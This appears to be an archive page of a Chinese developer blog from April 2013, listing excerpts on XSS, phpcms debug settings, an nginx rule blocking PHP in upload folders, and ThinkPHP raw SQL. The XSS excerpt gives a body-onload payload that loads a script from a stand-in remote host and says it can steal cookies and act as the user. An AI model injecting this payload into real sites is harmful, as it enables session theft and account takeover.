随笔 - 137  文章 - 1  评论 - 3  阅读 - 14万 
04 2013 档案
XSS 常见手段
摘要:<body onload="document.write('<script src=http://xxx.com/js/main.js></script>')"> 加载一段远程的JS 里面的代码自由发挥可以盗取cookie 模拟用户发帖 发文章 删除文章 基本上 只要你想到的 多可以做到 阅读全文
posted @ 2013-04-28 14:20 ヽ坚强的蘑菇 阅读(195) 评论(0) 推荐(0) 编辑
phpcms_v9 关闭debug
摘要:1 关闭数据库的 debug 打开项目下面的 caches/configs/database.php 找到 第12行 把 debug的值改为 false2 关闭 页面的错误信息 找到 caches/configs/system.php 第34行 把debug的值改为0 第36行 把errorlog的值改为0 同时最好把 第20行的 tpl_edit 的值改为0 找到 phpcms/base.php 第33行 这一句 pc_base::load_config('system','errorlog') ? set_error_handler('my_erro 阅读全文
posted @ 2013-04-24 10:37 ヽ坚强的蘑菇 阅读(454) 评论(0) 推荐(1) 编辑
nginx下禁止目录运行php
摘要:nginx下禁止目录执行php的方法则简单许多,允许设定多个目录不知道是否我对apache那个不了解,如果有更好的办法,希望大家指出共享学习。thxlocation ~* ^/(attachments|images)/.*\.(php|php5|PHP|PHP5)${deny all;}当web目录不是根目录,或者有多个目录的时候可以是location ~* ^(/discuz/|/bbs/)/(attachments|images)/.*\.(php|php5|PHP|PHP5)${deny all;} 阅读全文
posted @ 2013-04-10 16:39 ヽ坚强的蘑菇 阅读(147) 评论(0) 推荐(0) 编辑
新浪微博分享平台地址
摘要:http://open.weibo.com/sharebutton 阅读全文
posted @ 2013-04-10 11:32 ヽ坚强的蘑菇 阅读(154) 评论(0) 推荐(0) 编辑
thinkphp 直接写SQL
摘要:TP的模型可以支持原生SQL操作,提供了query和execute两个方法,为什么原生SQL还要区分两个方法呢,原因有两个:1、返回类型不同query用于查询,返回的是数据集,和select或者findall一样,所以可以直接在模板里面使用volist标签输出query的查询结果execute用于写操作,返回的是状态或者影响的记录数2、读写统计需要为了便于统计当前的数据读写次数,把数据库的读和写操作分开(对应的就是query和execute)使用原生SQL很简单,我们甚至不需要实例化任何的模型,例如:$Model = new Model(); // 实例化一个空模型下面的方法是等效的$Mode 阅读全文
posted @ 2013-04-09 12:03 ヽ坚强的蘑菇 阅读(1522) 评论(0) 推荐(1) 编辑

点击右上角即可分享
微信分享提示